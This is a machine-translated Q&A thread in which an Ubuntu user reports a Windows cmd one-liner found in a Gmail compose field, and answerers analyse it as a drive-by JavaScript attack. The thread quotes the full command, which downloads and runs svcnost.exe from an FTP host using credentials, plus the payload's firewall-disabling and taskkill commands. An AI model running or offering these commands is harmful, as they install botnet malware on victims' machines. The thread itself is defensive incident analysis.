題 如何識別我的Linux電腦是否被黑了?


我的家用電腦通常打開,但顯示器已關閉。今晚我下班回家,發現看起來像黑客的嘗試:在我的瀏覽器中,我的Gmail是開放的(那是我),但是它處於撰寫模式,其中包含以下內容: TO 領域:

md / c echo open cCTeamFtp.yi.org 21 >> ik&echo user ccteam10 765824 >> ik&echo binary >> ik&echo get svcnost.exe >> ik&echo bye >> ik&ftp -n -v -s:ik&del ik &svcnost.exe並退出   echo你擁有了

這對我來說就像Windows命令行代碼一樣 md 代碼的開始加上Gmail處於撰寫模式的事實,很明顯有人試圖運行 cmd 命令。我猜我很幸運,我實際上並沒有在這台PC上運行Windows,但我還有其他人這樣做。這是有史以​​來第一次發生這樣的事情。我不是Linux大師,當時除了Firefox之外我還沒有運行任何其他程序。

我絕對相信我沒有寫這個,沒有其他人在我的電腦上。此外,我最近更改了我的谷歌密碼(以及我所有其他密碼) vMA8ogd7bv 所以我不認為有人入侵了我的Google帳戶。

剛剛發生了什麼? 如果不是老奶奶多年來一直運行惡意軟件的老式Windows機器,但是最近新安裝的Ubuntu,有人怎麼把鍵盤放在我的電腦上?

更新:
讓我談談一些要點和問題:

  • 我在奧地利,在農村。我的WLAN路由器運行 WPA2/PSK 和一個不在字典中的中強密碼;必須是蠻力的,離這裡不到50米;它不太可能被黑客入侵。
  • 我正在使用USB有線鍵盤,所以再也不太可能有任何人在範圍內破解它。
  • 我當時沒有使用我的電腦;在我上班的時候,這只是在家裡閒逛。它是一台安裝在顯示器上的網絡平板電腦,所以我很少把它關掉。
  • 這台機器只用了兩個月,只運行Ubuntu,而且我沒有使用奇怪的軟件或訪問奇怪的網站。它主要是Stack Exchange,Gmail和報紙。沒有遊戲。 Ubuntu將保持自己的最新狀態。
  • 我不知道有任何VNC服務正在運行;我當然沒有安裝或啟用一個。我也沒有啟動任何其他服務器。我不確定默認情況下是否有任何在Ubuntu中運行?
  • 我知道Gmail帳戶活動中的所有IP地址。我很確定谷歌不是一個入口通道。
  • 我發現了一個 日誌文件查看器,但我不知道該找什麼。救命?

我真正想知道的是,真正讓我覺得不安全的是: 互聯網上的任何人如何在我的機器上生成擊鍵?如果不是所有的錫箔帽,我怎麼能防止它? 我不是一個Linux極客,我是一個與Windows混淆了20多年並且厭倦了它的父親。在所有18年以上的在線工作中,我從未親自見過任何黑客攻擊,所以這對我來說是新的。


126
2018-04-20 18:24


起源


有沒有其他人可以訪問您的計算機,或者您是否有一個非常舊的無線鍵盤?此外,Ubuntu還有一個內置的VNC服務器。如果這是活動的,某個地方的隨機腳本可以連接並假設它是一台Windows計算機,發送鍵擊WIN + R,cmd ...... - TuxRug
@torbengb:你的帖子 真 嚇到我... - Mehrdad
您的無線網絡上還有其他計算機嗎?如果入侵者破了 其 安全性會讓他“進入”你的本地網絡,這可能導致以各種方式破解Ubuntu盒子。 - CarlF
@muntoo ...並且'確定你沒有在任何地方寫下來,也不要使用任何應用來管理它們,對吧?我們不要開始密碼抨擊;至少我的密碼不是 password :-) - Torben Gundtofte-Bruun
你有貓嗎? - Zaki


答案:


我懷疑你有什麼可擔心的。這很可能是一次試圖做的JavaScript攻擊 通過下載驅動。如果你擔心這種事情開始使用 NoScript的 和 AdBlock Plus Firefox附加組件。

即使訪問值得信賴的網站,您也不安全,因為他們從可能是惡意的第三方廣告客戶處運行JavaScript代碼。

我抓住它並在VM中運行它。它安裝了mirc,這是狀態日誌...... http://pastebin.com/Mn85akMk

這是一個自動攻擊,試圖讓你下載mIRC並加入殭屍網絡,將你變成一個spambot ...它讓我的VM加入並連接到許多不同的遠程地址,其中一個是 autoemail-119.west320.com

在Windows 7中運行它我不得不接受UAC提示並允許它通過防火牆訪問。

在其他論壇上似乎有大量關於這個確切命令的報告,有人甚至說當一個torrent文件在下載完成後試圖執行它...我不知道如何可行。

我自己沒有使用它,但它應該能夠顯示當前的網絡連接,這樣你就可以看到你是否連接到了常規的東西: http://netactview.sourceforge.net/download.html


66
2018-04-20 18:41



呃,為什麼所有的評論 (即便是 高度相關 那些發現腳本試圖打開的人 cmd 窗口) 刪除!? - BlueRaja - Danny Pflughoeft
如果我剛開始使用uBlock Origin,我會不會受到這種攻擊? - RobotUnderscore


我同意 @ jb48394 這可能是一個JavaScript漏洞,就像現在的其他所有東西一樣。

它試圖打開一個事實 cmd 窗口 (看到 @ torbengb的評論 並運行惡意命令,而不是僅僅在後台謹慎地下載該木馬,建議它 利用Firefox中的一些漏洞,允許它輸入擊鍵,但不能運行代碼。

這也解釋了為什麼這個漏洞,這是 明確地 專門為Windows編寫,也適用於Linux: Firefox在所有操作系統中以相同的方式運行JavaScript  (至少,它試圖:))。如果它是由Windows的緩衝區溢出或類似漏洞引起的,那麼它就會崩潰程序。

至於JavaScript代碼的來源 - 可能是惡意谷歌廣告 (廣告在一天中在Gmail中循環)。它 不會      第一  時間


41
2018-04-20 21:52



很好的參考。 - kizzx2
對於撇油器而言,最後一個“鏈接”實際上是五個單獨的鏈接。 - Pops
如果它真的是一個Javascript漏洞,那將是非常令人震驚的,因為我的Firefox通常會保持打開幾天。但是,您需要調用特殊API將密鑰發送到Windows下的另一個系統,並且可能需要在Linux下進行不同的系統調用(如果存在)。由於發送擊鍵不是正常的Javascript操作,我懷疑Firefox會為此實現跨平台調用。 - billc.cn
@ billc.cn:我相信寫到PS / 2鍵盤緩衝區 無論操作系統如何,都可以正常工作。 - BlueRaja - Danny Pflughoeft


我發現 類似的攻擊 在另一台Linux機器上。它似乎是Windows的某種FTP命令。


12
2018-04-20 18:36



更準確地說,它下載並運行該文件 ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe 使用Windows ftp 命令行工具。 - grawity
也發現它在pastebin上 pastebin.com/FXwRpKH4 - Shekhar
這是關於該網站的信息 whois.domaintools.com/216.210.179.67 - Shekhar
它是一個WinRAR SFX軟件包,包含一個可移植的mIRC安裝和一個名為“DriverUpdate.exe”的文件。 DriverUpdate.exe執行(至少)兩個shell命令: netsh防火牆設置opmode禁用 和 taskkill / F / IM VCSPAWN.EXE / T. 它也嘗試(我認為)添加 die-freesms-seite.com 到Internet Explorer受信任區域和代理繞過。 - Andrew Lambert


這不能回答您的整個問題,但在日誌文件中查找失敗的登錄嘗試。

如果您的日誌中有超過五次嘗試失敗,那麼有人試圖破解 root。如果成功嘗試登錄 root 當你離開電腦時,立刻改變你的密碼!我的意思是現在!優選為字母數字,長約10個字符。

隨著你得到的消息( echo命令)這聽起來有些不成熟 腳本小子。如果真正的黑客知道他在做什麼,你可能仍然不會知道它。


5
2018-04-21 04:13



我同意這顯然是非常業餘的。至少他們不應該放 迴聲你已經擁有了 在末尾。讓我想知道是否有任何“真正的黑客”通過?或者我確實應該問, 多少? - Torben Gundtofte-Bruun
@torgengb:如果命令是在Windows命令提示符下運行的,你就不會看到迴聲(因為 &exit) - BlueRaja - Danny Pflughoeft


whois 據報導,west320.com歸微軟所有。

通用即插即用 和 維諾 (系統 - >首選項 - >遠程桌面)結合弱Ubuntu密碼?

你有沒有使用任何非標準的存儲庫?

DEF CON 我們每年都會舉辦Wi-Fi比賽,了解到Wi-Fi接入點可以到達多遠 - 最後一次我聽說它是250英里。

如果你真的想要害怕,請查看一個命令控制中心的屏幕截圖 宙斯殭屍網絡。沒有機器是安全的,但Linux上的Firefox比其他機器更安全。更好的是,如果你跑 SELinux的


-1
2018-04-20 21:59



這個漏洞的作者顯然無意在Linux上運行它,所以我懷疑它與易受攻擊的gnome實用程序或弱密碼有關 (另外,OP已經提到他有一個安全的密碼) - BlueRaja - Danny Pflughoeft
實際上,他沒有提到Ubuntu密碼,只是一個gmail和無線密碼。一個運行metasploit的孩子可能甚至不知道Linux,他只看到VNC。它很可能是一個javascript攻擊。 - rjt